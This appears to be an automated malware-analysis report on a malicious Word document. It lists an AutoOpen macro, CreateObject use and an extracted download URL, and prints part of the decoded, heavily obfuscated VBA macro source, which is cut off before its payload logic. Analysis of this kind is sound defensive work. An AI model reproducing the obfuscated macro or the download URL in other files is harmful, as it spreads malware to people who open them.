MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically when the document is opened. The macro uses a CreateObject call, a common technique for launching malicious payloads. The presence of an embedded URL suggests the macro's purpose is to download and execute a second-stage payload from a remote location; note, however, that the per-URL labels below attribute the extracted URL to the document body (OLE text) rather than to the macro source, so the download path has not been directly confirmed from the macro itself.
Heuristics 6
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
AutoOpen macro — high — OLE_VBA_AUTOOPEN: AutoOpen macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- URL: http://downloditnow.top/text.png — In document text (OLE body)
- URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 110294 bytes |
| SHA-256: 2359a033667b0166297d55bf00324e879c29de0c64480fb6b00b9d7bd880f090 | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QPqhao"
Public Function ueKKiQh67yGKL0b(ByRef FvNXy1sqKwtTQk As String, ByRef THREE As String) As String
Dim mHjZzT23sLzAXy6() As Byte
Dim j3UpX9l8kc1TUq As Object
If Len(Application.UserName) < 100 Then
Dim Wq7jZhy8mlfyKIt As String
End If
If Application.UserName = "QJwVaPUaLdt" Then
MsgBox ("XvL9fTMUGAm")
Else
Dim sp1e3wtTUbstlk As Integer
End If
Dim OSaZFqWkQDJYO1D5d0() As Byte
Dim xhWBWUZw4yoner, xO58k2gsWnj As Integer
xhWBWUZw4yoner = 6
xO58k2gsWnj = 6
#If RmxHRVKO2sa <> 0 Then
RmxHRVKO2sa = RmxHRVKO2sa + 6
Dim xvvejmyYqG8 As Variant
Else
Dim xvvejmyYqG8 As Object
#End If
If xhWBWUZw4yoner > xO58k2gsWnj Then
For lHarMJ36OLsbBr = xO58k2gsWnj To xhWBWUZw4yoner
xO58k2gsWnj = xO58k2gsWnj / xhWBWUZw4yoner
Next lHarMJ36OLsbBr
End If
Dim P3377dW4rqjJAU As Integer
For KrVtlIh8EkD = 3 To 33
P3377dW4rqjJAU = KrVtlIh8EkD
Next KrVtlIh8EkD
Dim JGiCK6t2KBdVEA As Integer
For ZvQGmL9Momw = 4 To 41
JGiCK6t2KBdVEA = ZvQGmL9Momw
Next ZvQGmL9Momw
Dim Z50ziAq7Jkqaog As Integer
Dim DiEHrTlaBxc As String
Z50ziAq7Jkqaog = 1535
Dim nJqa0FjIrh0 As Integer
DiEHrTlaBxc = Right(CStr(Z50ziAq7Jkqaog), Chr(Tan(CDbl(1.55039099610836))))
nJqa0FjIrh0 = CInt(DiEHrTlaBxc)
For EQtqT9h1pbY = nJqa0FjIrh0 To 99
Z50ziAq7Jkqaog = Z50ziAq7Jkqaog + 3
Next EQtqT9h1pbY
If Chr(Tan(CDbl(1.55860180934664))) = R Then
Dim eLKu0Ta7pmuSuu As String
Dim CfRX1bMrKpz As String
CfRX1bMrKpz = f23nMxDsK6r
eLKu0Ta7pmuSuu = QMOlf1mxdDz
End If
If (StrComp(eLKu0Ta7pmuSuu, CfRX1bMrKpz, vbTextCompare) <> 0) Then
MsgBox ("UYu0qnCA2Bf6Ob")
End If
Dim J5YSJ12W67xEjH As Object
If Len(Application.UserName) < 100 Then
Dim u8sf5YjPt4a8ogW As String
End If
Dim t9KrLpFIkGFXCW As Long
Dim pmxzYzH14Igcr2, ERvdSjuuN74 As String
pmxzYzH14Igcr2 = 8
ERvdSjuuN74 = 2
#If pmxzYzH14Igcr2 > ERvdSjuuN74 Then
Dim MPeYBNRJaK7 As Object
#Else
Dim MPeYBNRJaK7 As Integer
MPeYBNRJaK7 = 8 + 2
Dim sySBwKTksmv As Integer
For CBQ0TDyeCY2 = sySBwKTksmv To pmxzYzH14Igcr2
sySBwKTksmv = sySBwKTksmv + CInt(Chr(Tan(CDbl(1.55039099610836))))
Next CBQ0TDyeCY2
#End If
Dim DwIqipqiRTUl0F As Integer
Dim N5Zob7848br As String
DwIqipqiRTUl0F = 3399
Dim ooXRTWxtzrh As Integer
N5Zob7848br = Right(CStr(DwIqipqiRTUl0F), Chr(Tan(CDbl(1.55039099610836))))
ooXRTWxtzrh = CInt(N5Zob7848br)
For MLhUqdUfiB0 = ooXRTWxtzrh To 14
DwIqipqiRTUl0F = DwIqipqiRTUl0F + 8
Next MLhUqdUfiB0
Dim FHRekc2q5QCJTt, hEbhsiLuTYN As String
FHRekc2q5QCJTt = 3
hEbhsiLuTYN = 2
#If FHRekc2q5QCJTt > hEbhsiLuTYN Then
Dim SjCIy8mbvgD As Object
#Else
Dim SjCIy8mbvgD As Integer
SjCIy8mbvgD = 3 + 2
Dim T1jWzT1tPGo As Integer
For K0zk19ICWz3 = T1jWzT1tPGo To FHRekc2q5QCJTt
T1jWzT1tPGo = T1jWzT1tPGo + CInt(Chr(Tan(CDbl(1.55039099610836))))
Next K0zk19ICWz3
#End If
If Application.UserName = "r6Ti2RC8R64" Then
MsgBox ("uARtlDWFcb4")
Else
Dim llW6NMO95irBtZ As Integer
End If
If Len(Application.UserName) < 100 Then
Dim RPeAlkaafwJeIOM As String
End If
Dim GsJAxoSbwfEeKeZ As String
GsJAxoSbwfEeKeZ = Application.UserName
Dim Wyi4cKr9EvtMIRtrQ, ICyyDwdNfhNQygPQdTH As Integer
ICyyDwdNfhNQygPQdTH = Len(GsJAxoSbwfEeKeZ)
Dim WYAL5RUoonbtlcmX As Collection
While ICyyDwdNfhNQygPQdTH > 6
Wyi4cKr9EvtMIRtrQ = Wyi4cKr9EvtMIRtrQ + 4
ICyyDwdNfhNQygPQdTH = ICyyDwdNfhNQygPQdTH - 1
Wend
Dim rqOdQTBdkc1COMe As Collection
Set rqOdQTBdkc1COMe = New Collection
rqOdQTBdkc1COMe.Add "d5jheCS2voe8DTC0Vq5Q5bquDmZFb9QHPlAi0XSViAd4OOoSVTH4AspCPye2nMbvXXtcTdA8Xks57wgy7GtH2VGh57TB2arV"
rqOdQTBdkc1COMe.Add "g1fM81SJga9uEcSq4gcT3CQMgVK8F72XVQQpTvI1ysyqhK20tMfK2PydkTpnrUDjhmY"
rqOdQTBdkc1COMe.Add "nWJYleKNjoWcTP3csfGcwEAGfKepPJ5vEoGxWvRunQAoTKYFKHxHSWaiWD3aAf7atkYpIDG6NWyfDVwUvZ"
rqOdQTBdkc1COMe.Add "UydrNhdS10tHSk5svt6GA236h4fBQjplAxG4GqblkzEXmrNdZDiC"
rqOdQTBdkc1COMe.Add "Hb4hKSCbCSLIGc
... (truncated)
|
|||